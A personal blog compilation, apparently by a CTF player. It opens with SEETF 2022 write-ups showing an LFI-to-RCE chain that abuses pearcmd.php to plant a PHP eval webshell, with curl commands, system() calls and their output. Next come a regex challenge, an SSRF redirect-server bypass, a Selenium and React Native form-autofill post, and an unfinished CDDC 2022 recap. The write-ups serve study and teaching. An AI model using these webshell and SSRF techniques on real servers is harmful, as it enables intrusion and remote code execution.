Fortunately, I instead got the output of phpinfo, showing that it is an LFI vulnerability

$ curl "http://sourcelessguessyweb.chall.seetf.sg:1337/?page=../../../tmp/hi.php" 

...

</td></tr>
</table>
<table>
<tr><td class="e">System </td><td class="v">Linux app-6799f56885-p78l5 5.4.170+ #1 SMP Wed Mar 23 10:13:41 PDT 2022 x86_64 </td></tr>
<tr><td class="e">Build Date </td><td class="v">May 13 2022 22:25:02 </td></tr>
<tr><td class="e">Build System </td><td class="v">Linux 919d1ff24703 5.10.0-13-cloud-amd64 #1 SMP Debian 5.10.106-1 (2022-03-17) x86_64 GNU/Linux </td></tr>
<tr><td class="e">Configure Command </td><td class="v"> &#039;./configure&#039;  &#039;--build=x86_64-linux-gnu&#039; &#039;--with-config-file-path=/usr/local/etc/php&#039; &#039;--with-config-file-scan-dir=/usr/local/etc/php/conf.d&#039; &#039;--enable-option-checking=fatal&#039; &#039;--with-mhash&#039; &#039;--with-pic&#039; &#039;--enable-ftp&#039; &#039;--enable-mbstring&#039; &#039;--enable-mysqlnd&#039; &#039;--with-password-argon2&#039; &#039;--with-sodium=shared&#039; &#039;--with-pdo-sqlite=/usr&#039; &#039;--with-sqlite3=/usr&#039; &#039;--with-curl&#039; &#039;--with-iconv&#039; &#039;--with-openssl&#039; &#039;--with-readline&#039; &#039;--with-zlib&#039; &#039;--disable-phpdbg&#039; &#039;--with-pear&#039; &#039;--with-libdir=lib/x86_64-linux-gnu&#039; &#039;--disable-cgi&#039; &#039;--with-apxs2&#039; &#039;build_alias=x86_64-linux-gnu&#039; </td></tr>
<tr><td class="e">Server API </td><td class="v">Apache 2.0 Handler </td></tr>
<tr><td class="e">Virtual Directory Support </td><td class="v">disabled </td></tr>
<tr><td class="e">Configuration File (php.ini) Path </td><td class="v">/usr/local/etc/php </td></tr>
<tr><td class="e">Loaded Configuration File </td><td class="v">(none) </td></tr>
<tr><td class="e">Scan this dir for additional .ini files </td><td class="v">/usr/local/etc/php/conf.d </td></tr>
<tr><td class="e">Additional .ini files parsed </td><td class="v">/usr/local/etc/php/conf.d/docker-php-ext-sodium.ini
 </td></tr>

How I found the exploit out in the CTF

I randomly tried accessing /tmp/hi.php because I tried creating it via another exploit (phpinfo LFI to RCE). Never expect someone else already create it. It included the file /usr/local/lib/php/pearcmd.php and realised this could lead to a webshell.

I expected the /tmp directory to be always clean to prevent interferrence. But oh well, works for me!

(base) [hacker@hackerbook tmp]$ curl "http://sourcelessguessyweb.chall.seetf.sg:1337/?page=../../../tmp/hi.php" 

<!--
\        /|   |\   /   /~~  /~~\    /~~ |~~ |~~\| /~~\ |   |/~~
 \  /\  / |---| \ /    |__ |    |   |__ |-- |__/||    ||   ||__
  \/  \/  |   |  |     ___| \__/    ___||__ |  \| \__/  \_/ ___|
-->

...

whysoserious/pear";s:7:"man_dir";s:79:"/&page=../../../../../usr/local/lib/php/pearcmd.php&/index.php
main.css
phpinfo.php
whysoserious
whysoserious/pear/man";}    `.replace(/[^A-Za-z0-9!?]/g, ' ').trim();

    if (message) {
        let currIdx = 0;
        let messageLength = message.length;

        let parts = document.querySelectorAll('.lazarus-pit > div');
        for (let i = 0; i < parts.length; i++) {
            let partLength = parts[i].innerHTML.length;

            parts[i].innerHTML = '';

            for (let j = 0; j < partLength; j++) {
                parts[i].innerHTML += message[currIdx % messageLength];
                currIdx++;
            }
        }
    }
</script>
</html>(base) [hacker@hackerbook tmp]$

Pearcmd exploit

On researching more in pearcmd, I found out that there are other writeups for it already. We could use the payloads there.

First I tested that the file I'm creating does not exist yet

(base) [hacker@hackerbook tmp]$ curl "http://sourcelessguessyweb.chall.seetf.sg:1337/?page=../../../tmp/eval.php"  -d "1=system('whoami');"

<!--
\        /|   |\   /   /~~  /~~\    /~~ |~~ |~~\| /~~\ |   |/~~
 \  /\  / |---| \ /    |__ |    |   |__ |-- |__/||    ||   ||__
  \/  \/  |   |  |     ___| \__/    ___||__ |  \| \__/  \_/ ___|
-->

...

<script>
    let message = `
            `.replace(/[^A-Za-z0-9!?]/g, ' ').trim();

    if (message) {
        let currIdx = 0;
        let messageLength = message.length;

        let parts = document.querySelectorAll('.lazarus-pit > div');
        for (let i = 0; i < parts.length; i++) {
            let partLength = parts[i].innerHTML.length;

            parts[i].innerHTML = '';

            for (let j = 0; j < partLength; j++) {
                parts[i].innerHTML += message[currIdx % messageLength];
                currIdx++;
            }
        }
    }
</script>
</html>

Creating a webshell file to access via LFI later. I modified /test.php?+config-create+/&file=/usr/share/php/pearcmd.php&/<?=eval($_POST[1])?>+/tmp/hello.php that I can find at https://chowdera.com/2022/02/202202080401099387.html, especially the file path and the LFI parameter to fit the context.

I changed /test.php to / to fit the path affected by LFI on the challenge
I changed &file= to &page= to fit the parameter affected by LFI on the challenge
I changed /tmp/hello.php to /tmp/eval.php to change the file to write to

(base) [hacker@hackerbook tmp]$ curl "http://sourcelessguessyweb.chall.seetf.sg+config-create+/&page=../../../usr/local/lib/php/pearcmd.php&/<?=eval(\$_POST\[1\])?>+/tmp/eval.php"

<!--
\        /|   |\   /   /~~  /~~\    /~~ |~~ |~~\| /~~\ |   |/~~
 \  /\  / |---| \ /    |__ |    |   |__ |-- |__/||    ||   ||__
  \/  \/  |   |  |     ___| \__/    ___||__ |  \| \__/  \_/ ___|
-->
...

<script>
    let message = `
        CONFIGURATION (CHANNEL PEAR.PHP.NET):
=====================================
Auto-discover new Channels     auto_discover    <not set>
Default Channel                default_channel  pear.php.net
HTTP Proxy Server Address      http_proxy       <not set>
PEAR server [DEPRECATED]       master_server    <not set>
Default Channel Mirror         preferred_mirror <not set>
Remote Configuration File      remote_config    <not set>
PEAR executables directory     bin_dir          /&page=../../../usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1])?>/pear
PEAR documentation directory   doc_dir          /&page=../../../usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1])?>/pear/docs
PHP extension directory        ext_dir          /&page=../../../usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1])?>/pear/ext
PEAR directory                 php_dir          /&page=../../../usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1])?>/pear/php
PEAR Installer cache directory cache_dir        /&page=../../../usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1])?>/pear/cache
PEAR configuration file        cfg_dir          /&page=../../../usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1])?>/pear/cfg
directory
PEAR data directory            data_dir         /&page=../../../usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1])?>/pear/data
PEAR Installer download        download_dir     /&page=../../../usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1])?>/pear/download
directory
Systems manpage files          man_dir          /&page=../../../usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1])?>/pear/man
directory
PEAR metadata directory        metadata_dir     <not set>
PHP CLI/CGI binary             php_bin          <not set>
php.ini location               php_ini          <not set>
--program-prefix passed to     php_prefix       <not set>
PHP's ./configure
--program-suffix passed to     php_suffix       <not set>
PHP's ./configure
PEAR Installer temp directory  temp_dir         /&page=../../../usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1])?>/pear/temp
PEAR test directory            test_dir         /&page=../../../usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1])?>/pear/tests
PEAR www files directory       www_dir          /&page=../../../usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1])?>/pear/www
Cache TimeToLive               cache_ttl        <not set>
Preferred Package State        preferred_state  <not set>
Unix file mask                 umask            <not set>
Debug Log Level                verbose          <not set>
PEAR password (for             password         <not set>
maintainers)
Signature Handling Program     sig_bin          <not set>
Signature Key Directory        sig_keydir       <not set>
Signature Key Id               sig_keyid        <not set>
Package Signature Type         sig_type         <not set>
PEAR username (for             username         <not set>
maintainers)
User Configuration File        Filename         /tmp/eval.php
System Configuration File      Filename         #no#system#config#
Successfully created default configuration file "/tmp/eval.php"
    `.replace(/[^A-Za-z0-9!?]/g, ' ').trim();

    if (message) {
        let currIdx = 0;
        let messageLength = message.length;

        let parts = document.querySelectorAll('.lazarus-pit > div');
        for (let i = 0; i < parts.length; i++) {
            let partLength = parts[i].innerHTML.length;

            parts[i].innerHTML = '';

            for (let j = 0; j < partLength; j++) {
                parts[i].innerHTML += message[currIdx % messageLength];
                currIdx++;
            }
        }
    }
</script>
</html>
(base) [hacker@hackerbook tmp]$

Accessing the file to run custom code.

(base) [hacker@hackerbook tmp]$ curl "http://sourcelessguessyweb.chall.seetf.sg:1337/?page=../../../tmp/eval.php"  -d "1=system('whoami');"

<!--
\        /|   |\   /   /~~  /~~\    /~~ |~~ |~~\| /~~\ |   |/~~
 \  /\  / |---| \ /    |__ |    |   |__ |-- |__/||    ||   ||__
  \/  \/  |   |  |     ___| \__/    ___||__ |  \| \__/  \_/ ___|
-->

...

<script>
    let message = `
        #PEAR_Config 0.9
a:12:{s:7:"php_dir";s:76:"/&page=../../../usr/local/lib/php/pearcmd.php&/www-data
/pear/php";s:8:"data_dir";s:77:"/&page=../../../usr/local/lib/php/pearcmd.php&/www-data
/pear/data";s:7:"www_dir";s:76:"/&page=../../../usr/local/lib/php/pearcmd.php&/www-data
/pear/www";s:7:"cfg_dir";s:76:"/&page=../../../usr/local/lib/php/pearcmd.php&/www-data
/pear/cfg";s:7:"ext_dir";s:76:"/&page=../../../usr/local/lib/php/pearcmd.php&/www-data
/pear/ext";s:7:"doc_dir";s:77:"/&page=../../../usr/local/lib/php/pearcmd.php&/www-data
/pear/docs";s:8:"test_dir";s:78:"/&page=../../../usr/local/lib/php/pearcmd.php&/www-data
/pear/tests";s:9:"cache_dir";s:78:"/&page=../../../usr/local/lib/php/pearcmd.php&/www-data
/pear/cache";s:12:"download_dir";s:81:"/&page=../../../usr/local/lib/php/pearcmd.php&/www-data
/pear/download";s:8:"temp_dir";s:77:"/&page=../../../usr/local/lib/php/pearcmd.php&/www-data
/pear/temp";s:7:"bin_dir";s:72:"/&page=../../../usr/local/lib/php/pearcmd.php&/www-data
/pear";s:7:"man_dir";s:76:"/&page=../../../usr/local/lib/php/pearcmd.php&/www-data
/pear/man";}    `.replace(/[^A-Za-z0-9!?]/g, ' ').trim();

    if (message) {
        let currIdx = 0;
        let messageLength = message.length;

        let parts = document.querySelectorAll('.lazarus-pit > div');
        for (let i = 0; i < parts.length; i++) {
            let partLength = parts[i].innerHTML.length;

            parts[i].innerHTML = '';

            for (let j = 0; j < partLength; j++) {
                parts[i].innerHTML += message[currIdx % messageLength];
                currIdx++;
            }
        }
    }
</script>

RCE

I tested listing everything in the root directory

(base) [hacker@hackerbook tmp]$ curl "http://sourcelessguessyweb.chall.seetf.sg:1337/?page=../../../tmp/eval.php"  -d "1=system('ls /');"

<!--
\        /|   |\   /   /~~  /~~\    /~~ |~~ |~~\| /~~\ |   |/~~
 \  /\  / |---| \ /    |__ |    |   |__ |-- |__/||    ||   ||__
  \/  \/  |   |  |     ___| \__/    ___||__ |  \| \__/  \_/ ___|
-->

...

/pear";s:7:"man_dir";s:76:"/&page=../../../usr/local/lib/php/pearcmd.php&/bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
readflag
root
run
sbin
srv
sys
tmp
usr
var
/pear/man";}    `.replace(/[^A-Za-z0-9!?]/g, ' ').trim();

    if (message) {
        let currIdx = 0;
        let messageLength = message.length;

        let parts = document.querySelectorAll('.lazarus-pit > div');
        for (let i = 0; i < parts.length; i++) {
            let partLength = parts[i].innerHTML.length;

            parts[i].innerHTML = '';

            for (let j = 0; j < partLength; j++) {
                parts[i].innerHTML += message[currIdx % messageLength];
                currIdx++;
            }
        }
    }
</script>

</html>(base) [hacker@hackerbook tmp]$ curl "http://sourcelessguessyweb.chall.seetf.sg:1337/?page=../../../tmp/eval.php"  -d "1=system('/readflag');"

<!--
\        /|   |\   /   /~~  /~~\    /~~ |~~ |~~\| /~~\ |   |/~~
 \  /\  / |---| \ /    |__ |    |   |__ |-- |__/||    ||   ||__
  \/  \/  |   |  |     ___| \__/    ___||__ |  \| \__/  \_/ ___|
-->

...

<script>
    let message = `
        #PEAR_Config 0.9
a:12:{s:7:"php_dir";s:76:"/&page=../../../usr/local/lib/php/pearcmd.php&/SEE{l0l_s0urc3_w0uldn't_h4v3_h3lp3d_th1s_1s_d3fault_PHP_d0cker}/pear/php";s:8:"data_dir";s:77:"/&page=../../../usr/local/lib/php/pearcmd.php&/SEE{l0l_s0urc3_w0uldn't_h4v3_h3lp3d_th1s_1s_d3fault_PHP_d0cker}/pear/data";s:7:"www_dir";s:76:"/&page=../../../usr/local/lib/php/pearcmd.php&/SEE{l0l_s0urc3_w0uldn't_h4v3_h3lp3d_th1s_1s_d3fault_PHP_d0cker}/pear/www";s:7:"cfg_dir";s:76:"/&page=../../../usr/local/lib/php/pearcmd.php&/SEE{l0l_s0urc3_w0uldn't_h4v3_h3lp3d_th1s_1s_d3fault_PHP_d0cker}/pear/cfg";s:7:"ext_dir";s:76:"/&page=../../../usr/local/lib/php/pearcmd.php&/SEE{l0l_s0urc3_w0uldn't_h4v3_h3lp3d_th1s_1s_d3fault_PHP_d0cker}/pear/ext";s:7:"doc_dir";s:77:"/&page=../../../usr/local/lib/php/pearcmd.php&/SEE{l0l_s0urc3_w0uldn't_h4v3_h3lp3d_th1s_1s_d3fault_PHP_d0cker}/pear/docs";s:8:"test_dir";s:78:"/&page=../../../usr/local/lib/php/pearcmd.php&/SEE{l0l_s0urc3_w0uldn't_h4v3_h3lp3d_th1s_1s_d3fault_PHP_d0cker}/pear/tests";s:9:"cache_dir";s:78:"/&page=../../../usr/local/lib/php/pearcmd.php&/SEE{l0l_s0urc3_w0uldn't_h4v3_h3lp3d_th1s_1s_d3fault_PHP_d0cker}/pear/cache";s:12:"download_dir";s:81:"/&page=../../../usr/local/lib/php/pearcmd.php&/SEE{l0l_s0urc3_w0uldn't_h4v3_h3lp3d_th1s_1s_d3fault_PHP_d0cker}/pear/download";s:8:"temp_dir";s:77:"/&page=../../../usr/local/lib/php/pearcmd.php&/SEE{l0l_s0urc3_w0uldn't_h4v3_h3lp3d_th1s_1s_d3fault_PHP_d0cker}/pear/temp";s:7:"bin_dir";s:72:"/&page=../../../usr/local/lib/php/pearcmd.php&/SEE{l0l_s0urc3_w0uldn't_h4v3_h3lp3d_th1s_1s_d3fault_PHP_d0cker}/pear";s:7:"man_dir";s:76:"/&page=../../../usr/local/lib/php/pearcmd.php&/SEE{l0l_s0urc3_w0uldn't_h4v3_h3lp3d_th1s_1s_d3fault_PHP_d0cker}/pear/man";}    `.replace(/[^A-Za-z0-9!?]/g, ' ').trim();

    if (message) {
        let currIdx = 0;
        let messageLength = message.length;

        let parts = document.querySelectorAll('.lazarus-pit > div');
        for (let i = 0; i < parts.length; i++) {
            let partLength = parts[i].innerHTML.length;

            parts[i].innerHTML = '';

            for (let j = 0; j < partLength; j++) {
                parts[i].innerHTML += message[currIdx % messageLength];
                currIdx++;
            }
        }
    }
</script>
(base) [hacker@hackerbook tmp]$

How you could have potentially found out in the CTF

Looking at the eventual flag, I realised that we could have discovered the exploit without relying on other people exploit.

Firstly, since this is a PHP web application, and CTFs generally used docker images, we could have inferred that a php container was used.

I firstly tried to download the container.

┌──(kali㉿kali)-[~/Documents/Notes/SEETF/username_gen]
└─$ sudo docker run -it php bash
[sudo] password for kali: 
Unable to find image 'php:latest' locally
latest: Pulling from library/php
42c077c10790: Pull complete 
8934009a9160: Pull complete 
5357ac116991: Pull complete 
54ae63894b5a: Pull complete 
72281f038a08: Pull complete 
9fd1b94317fe: Pull complete 
00012d9e2ea5: Pull complete 
2c220aff91be: Pull complete 
48cfe9bf9b47: Pull complete 
Digest: sha256:578dc5919121a9950174a1aa59d00815de87c767451320a527261763eafab8f0
Status: Downloaded newer image for php:latest
root@f869105b6e8b:/# ls
bin  boot  dev  etc  home  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
root@f869105b6e8b:/# cd /usr/local/lib/php/

We could then enumerate for php files. You can notice that pearcmd.php is inside, which could lead to an exploit.

root@f869105b6e8b:/# find -name "*.php"
./usr/local/lib/php/OS/Guess.php
./usr/local/lib/php/doc/XML_Util/examples/example.php
./usr/local/lib/php/doc/XML_Util/examples/example2.php
./usr/local/lib/php/Structures/Graph.php
./usr/local/lib/php/Structures/Graph/Manipulator/AcyclicTest.php
./usr/local/lib/php/Structures/Graph/Manipulator/TopologicalSorter.php
./usr/local/lib/php/Structures/Graph/Node.php
./usr/local/lib/php/Archive/Tar.php
./usr/local/lib/php/PEAR/Config.php
./usr/local/lib/php/PEAR/DependencyDB.php
./usr/local/lib/php/PEAR/Dependency2.php
./usr/local/lib/php/PEAR/Command.php
./usr/local/lib/php/PEAR/Proxy.php
./usr/local/lib/php/PEAR/PackageFile.php
./usr/local/lib/php/PEAR/REST.php
./usr/local/lib/php/PEAR/Downloader/Package.php
./usr/local/lib/php/PEAR/Validate.php
./usr/local/lib/php/PEAR/Builder.php
./usr/local/lib/php/PEAR/Validator/PECL.php
./usr/local/lib/php/PEAR/Command/Config.php
./usr/local/lib/php/PEAR/Command/Remote.php
./usr/local/lib/php/PEAR/Command/Auth.php
./usr/local/lib/php/PEAR/Command/Test.php
./usr/local/lib/php/PEAR/Command/Mirror.php
./usr/local/lib/php/PEAR/Command/Pickle.php
./usr/local/lib/php/PEAR/Command/Registry.php
./usr/local/lib/php/PEAR/Command/Build.php
./usr/local/lib/php/PEAR/Command/Channels.php
./usr/local/lib/php/PEAR/Command/Install.php
./usr/local/lib/php/PEAR/Command/Package.php
./usr/local/lib/php/PEAR/Command/Common.php
./usr/local/lib/php/PEAR/Downloader.php
./usr/local/lib/php/PEAR/Task/Unixeol.php
./usr/local/lib/php/PEAR/Task/Postinstallscript.php
./usr/local/lib/php/PEAR/Task/Replace/rw.php
./usr/local/lib/php/PEAR/Task/Replace.php
./usr/local/lib/php/PEAR/Task/Windowseol.php
./usr/local/lib/php/PEAR/Task/Postinstallscript/rw.php
./usr/local/lib/php/PEAR/Task/Unixeol/rw.php
./usr/local/lib/php/PEAR/Task/Windowseol/rw.php
./usr/local/lib/php/PEAR/Task/Common.php
./usr/local/lib/php/PEAR/Frontend/CLI.php
./usr/local/lib/php/PEAR/Installer/Role.php
./usr/local/lib/php/PEAR/Installer/Role/Php.php
./usr/local/lib/php/PEAR/Installer/Role/Script.php
./usr/local/lib/php/PEAR/Installer/Role/Man.php
./usr/local/lib/php/PEAR/Installer/Role/Data.php
./usr/local/lib/php/PEAR/Installer/Role/Src.php
./usr/local/lib/php/PEAR/Installer/Role/Cfg.php
./usr/local/lib/php/PEAR/Installer/Role/Test.php
./usr/local/lib/php/PEAR/Installer/Role/Www.php
./usr/local/lib/php/PEAR/Installer/Role/Doc.php
./usr/local/lib/php/PEAR/Installer/Role/Ext.php
./usr/local/lib/php/PEAR/Installer/Role/Common.php
./usr/local/lib/php/PEAR/XMLParser.php
./usr/local/lib/php/PEAR/Frontend.php
./usr/local/lib/php/PEAR/ChannelFile/Parser.php
./usr/local/lib/php/PEAR/ChannelFile.php
./usr/local/lib/php/PEAR/Registry.php
./usr/local/lib/php/PEAR/ErrorStack.php
./usr/local/lib/php/PEAR/Exception.php
./usr/local/lib/php/PEAR/REST/13.php
./usr/local/lib/php/PEAR/REST/10.php
./usr/local/lib/php/PEAR/REST/11.php
./usr/local/lib/php/PEAR/PackageFile/v2/Validator.php
./usr/local/lib/php/PEAR/PackageFile/v2/rw.php
./usr/local/lib/php/PEAR/PackageFile/Generator/v1.php
./usr/local/lib/php/PEAR/PackageFile/Generator/v2.php
./usr/local/lib/php/PEAR/PackageFile/Parser/v1.php
./usr/local/lib/php/PEAR/PackageFile/Parser/v2.php
./usr/local/lib/php/PEAR/PackageFile/v1.php
./usr/local/lib/php/PEAR/PackageFile/v2.php
./usr/local/lib/php/PEAR/Installer.php
./usr/local/lib/php/PEAR/RunTest.php
./usr/local/lib/php/PEAR/Common.php
./usr/local/lib/php/PEAR/Packager.php
./usr/local/lib/php/Console/Getopt.php
./usr/local/lib/php/XML/Util.php
./usr/local/lib/php/test/XML_Util/tests/ApiVersionTests.php
./usr/local/lib/php/test/XML_Util/tests/CreateTagFromArrayTests.php
./usr/local/lib/php/test/XML_Util/tests/AttributesToStringTests.php
./usr/local/lib/php/test/XML_Util/tests/RaiseErrorTests.php
./usr/local/lib/php/test/XML_Util/tests/Bug21177Tests.php
./usr/local/lib/php/test/XML_Util/tests/Bug5392Tests.php
./usr/local/lib/php/test/XML_Util/tests/CreateTagTests.php
./usr/local/lib/php/test/XML_Util/tests/GetXmlDeclarationTests.php
./usr/local/lib/php/test/XML_Util/tests/CreateCDataSectionTests.php
./usr/local/lib/php/test/XML_Util/tests/GetDocTypeDeclarationTests.php
./usr/local/lib/php/test/XML_Util/tests/Bug21184Tests.php
./usr/local/lib/php/test/XML_Util/tests/AbstractUnitTests.php
./usr/local/lib/php/test/XML_Util/tests/IsValidNameTests.php
./usr/local/lib/php/test/XML_Util/tests/Bug4950Tests.php
./usr/local/lib/php/test/XML_Util/tests/CreateStartElementTests.php
./usr/local/lib/php/test/XML_Util/tests/ReverseEntitiesTests.php
./usr/local/lib/php/test/XML_Util/tests/SplitQualifiedNameTests.php
./usr/local/lib/php/test/XML_Util/tests/CreateCommentTests.php
./usr/local/lib/php/test/XML_Util/tests/CreateEndElementTests.php
./usr/local/lib/php/test/XML_Util/tests/Bug18343Tests.php
./usr/local/lib/php/test/XML_Util/tests/ReplaceEntitiesTests.php
./usr/local/lib/php/test/XML_Util/tests/CollapseEmptyTagsTests.php
./usr/local/lib/php/test/Structures_Graph/tests/AcyclicTestTest.php
./usr/local/lib/php/test/Structures_Graph/tests/TopologicalSorterTest.php
./usr/local/lib/php/test/Structures_Graph/tests/AllTests.php
./usr/local/lib/php/test/Structures_Graph/tests/BasicGraphTest.php
./usr/local/lib/php/pearcmd.php
./usr/local/lib/php/peclcmd.php
./usr/local/lib/php/build/gen_stub.php
./usr/local/lib/php/build/run-tests.php
./usr/local/lib/php/System.php
./usr/local/lib/php/PEAR.php
root@f869105b6e8b:/#

We could locate the file we used in the exploit.

root@f869105b6e8b:/usr/local/lib/php# ls
Archive  Console  OS  PEAR  PEAR.php  Structures  System.php  XML  build  data  doc  extensions  pearcmd.php  peclcmd.php  test
root@f869105b6e8b:/usr/local/lib/php#

Furthermore, register_argc_argv is On, which is needed for the pearcmd.php exploit

This challenge taught me to look deeper, look at all parts of the infrastructure, instead of just being focused on specific techniques.

Flags

SEE{2nd_fl4g_n33ds_RCE_g00d_luck_h4x0r}
SEE{l0l_s0urc3_w0uldn't_h4v3_h3lp3d_th1s_1s_d3fault_PHP_d0cker}

Misc - Regex101

Solution

I copied the text file to http://regexr.com, and used it to find the flag.

My regex expression SEE{[A-Z]{5}[0-9]{5}[A-Z]{6}} is quite straightforward and can be explained by regexr

Flag

SEE{RGSXG13841KLWIUO}

Others - SSRF

I only solved this after the CTF (using reference), but basically, looking at the source code

from flask import Flask, request, render_template
import os
import advocate
import requests

app = Flask(__name__)


@app.route('/', methods=['GET', 'POST'])
def index():

    if request.method == 'POST':
        url = request.form['url']

        # Prevent SSRF
        try:
            advocate.get(url)

        except:
            return render_template('index.html', error=f"The URL you entered is dangerous and not allowed.")

        r = requests.get(url)
        return render_template('index.html', result=r.text)

    return render_template('index.html')


@app.route('/flag')
def flag():
    if request.remote_addr == '127.0.0.1':
        return render_template('flag.html', FLAG=os.environ.get("FLAG"))

    else:
        return render_template('forbidden.html'), 403


if __name__ == '__main__':
    app.run(host="0.0.0.0", port=80, threaded=True)

You notice these lines. The advocate.get and requests.get means that the web server is called twice. advocate is protected against SSRF (you can google more about the python library), but requests isn't. If only I actually read the last line in the CTF...

        try:
            advocate.get(url)

        except:
            return render_template('index.html', error=f"The URL you entered is dangerous and not allowed.")

        r = requests.get(url)

Hence the goal is to create a web server where the first request bypasses advocate, but the 2nd request can redirect the client to the desired webpage, in this case /flag which can only be accessed locally.

Here is my code

# Python 3 server example
# Copied from https://pythonbasics.org/webserver/ with minor edits
from http.server import BaseHTTPRequestHandler, HTTPServer
import time

hostName = "localhost"
serverPort = 8080


count = 0

class MyServer(BaseHTTPRequestHandler):
    def do_GET(self):
        global count 
        if count == 0:
            self.option1()
            count += 1
        else:
            self.option2()

    def option1(self): # Bypass advocate on first request
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(bytes("<html><head><title>https://pythonbasics.org</title></head>", "utf-8"))
        self.wfile.write(bytes("<p>Request: %s</p>" % self.path, "utf-8"))
        self.wfile.write(bytes("<body>", "utf-8"))
        self.wfile.write(bytes("<p>This is an example web server.</p>", "utf-8"))
        self.wfile.write(bytes("</body></html>", "utf-8"))

    def option2(self): # redirect
       self.send_response(301)
       self.send_header('Location','http://localhost/flag')
       self.end_headers()

if __name__ == "__main__":        
    webServer = HTTPServer((hostName, serverPort), MyServer)
    print("Server started http://%s:%s" % (hostName, serverPort))

    try:
        webServer.serve_forever()
    except KeyboardInterrupt:
        pass

    webServer.server_close()
    print("Server stopped.")

I used ngrok to tunnel this web server, and submit the nrgok url to get the flag.

Automating forms with Selenium or React Native

Terence Chan Zun Mun — Sun, 14 Aug 2022 15:59:47 +0000

While serving my conscription period, I've noticed that there are quite a number of digital forms to fill up. And these are not 1-time forms, these are forms I have to fill every day. Being a problem solver myself (and a lazy one at that), I've wanted to make these forms much easier to fill up. I wanted to

Store data in a much easier manner
Process it into the data expected by the form
Autofill the form

After some experimentation, I've figured out a few solutions

Selenium

I've done some CTF challenges in June 2022 (HTB CTF, SEETF), some of which include the usage of this Python library called selenium as a Web Bot. I had to read code using this library before, and I figured I could use it to automate the submission of my forms.

Getting it up and running is actually quite easy. Firstly, you need to install it and its necessary dependencies. You should pip install selenium, but you also need to install a Web Browser Driver. I used ChromeDriver, but there is also GeckoDriver for Firefox.

Here is a sample piece of code. it fills up a text box which you can select by the element ID and clicks an element. With these concepts you probably can make a script to autofill your own form

from selenium import webdriver
from selenium.webdriver.common.by import By
import time

def visit_report():
    chrome_options = webdriver.ChromeOptions()
    chrome_options.add_argument("--incognito")
    client = webdriver.Chrome(chrome_options=chrome_options,
        executable_path=r"/run/media/hacker/Windows/Users/zunmu/Documents/Stuff/Linux Tools/chromedriver")
        #executable_path=r"D:\\chromedriver.exe")
    client.set_page_load_timeout(10)
    client.set_script_timeout(10)

    client.get('https://www.w3schools.com/html/html_forms.asp')
    time.sleep(3)
    ### Fill up text fields
    client.find_element_by_id("fname").send_keys("Data")
    client.find_element_by_id("lname").click()
    ### Traversing the DOM
    button = (
        client.find_element_by_id("fname")
        .find_element(by=By.XPATH,value='..')
        .find_elements_by_xpath(".//*")[-1]
    )
    button.click()
    time.sleep(300)
    client.quit()

visit_report()

Selenium Python has some useful resources like

One of the benefits of this is that you can use whatever libraries you want and that it's easy to code. I ended up combining Selenium and openpyxl, an Excel Sheet Python Library, to read the data from an Excel Sheet and autofill a form.

Mobile Selenium?

The top is great and all, but I wanted something mobile. I don't bring my laptop with me everywhere after all. My first approach was to just run my selenium code on mobile.

I had previously set up Kali NetHunter on my Android Phone and was thinking if it could just run my Python Script as is. Turns out, Chrome isn't supported on my Kali NetHunter installation due to some SUID misconfiguration.

I switched the driver to GeckoDriver, to take advantage of the Firefox preinstalled on nethunter. I found an ARM binary here, downloaded it, and updated my script with the new WebDriver like here.

It generally ended up working quite well, no need to recode everything, but

You have to go through NetHunter, which is not a very intuitive interface.
It only works on Android, and not on iOS

I wanted a better solution so that I can share the joy of auto-filling forms with others

React-Native / Expo

On a whim, I decided to search up React Native WebView, and check if it has the functionality to autofill them. I got something even better, we can inject our own custom Javascript code with the injectedJavaScript prop. Referenced from here.

<WebView 
      style={styles.container}
      source={{uri: 'https://github.com/react-native-community/react-native-webview'}}  
      javaScriptEnabled={true}
      injectedJavaScript={`document.body.style.backgroundColor = 'red';
      setTimeout(function() { window.alert('hi') }, 2000);
      true;`}    
      onMessage={(event) => {}}
    />

%[http://snack.expo.dev/@hackin7/basic-webview-usage]

You should take note that the code you want to run to autofill the document should probably be in setTimeout to run a few seconds after the document loads (probably to give it time to load).

With this, I spent a weekend working on making a Proof of Concept App to automatically fill up forms. I used document.getElementById("<id>").value = <value>; and <element>.click(); in Javascript. Making the app is as hard as making a typical mobile app (harder than selenium, but nothing too complicated or challenging).

And that's my journey towards building an Application to automatically fill up the form I need.

Overall

Generally, Selenium is good for quick prototyping, while you can use React Native/ Expo to finalise a proper application.

There are probably many other ways to do this. For example, the Android SDK's WebView probably has the functionality to interact with the elements, as shown here. Alternatively, you could just manually code a Python script, which could generate Javascript to paste in the Developer Console (though not the most elegant solution).

CDDC 2022 in Thailand Outfield

Terence Chan Zun Mun — Fri, 24 Jun 2022 06:42:49 +0000

CDDC, or Cyber Defenders Discovery Camp is a Capture the Flag Competition hosted by DSTA for Singaporeans. I usually participate in the JC/IP category since my education background is as such.

Last year, I did CDDC 2021 in Ex Crescendo. I overcame the odds and did it in outfield, with a spotty data signal and no laptop

This year, its time for CDDC 2022 Ex Crescendo. But this time, it's in Thailand.

Overall

Thoughts

Our team, NYCP got 12th place. Not bad for 3 guys currently serving NS at the same time.

https://docs.google.com/spreadsheets/d/1inUj_QOlWg61jBA6h-Rm_WdsS2N2c1954HmkXB63gfY/edit?usp=sharing

This CTF was fun and good. Got to use some of my OSCP knowledge, revise some Pwning, learn about 64bit format string bugs, improve my web skills and more. Only regret is that i could have tried harder for this to aim for top 10, but oh well.

How we did the challenges

For me it's the same thing as last year. The main strategies I used are

Kali Nethunter
Tmate to SSH into home desktop

However, in Thailand, there are some things which are for better or for worse

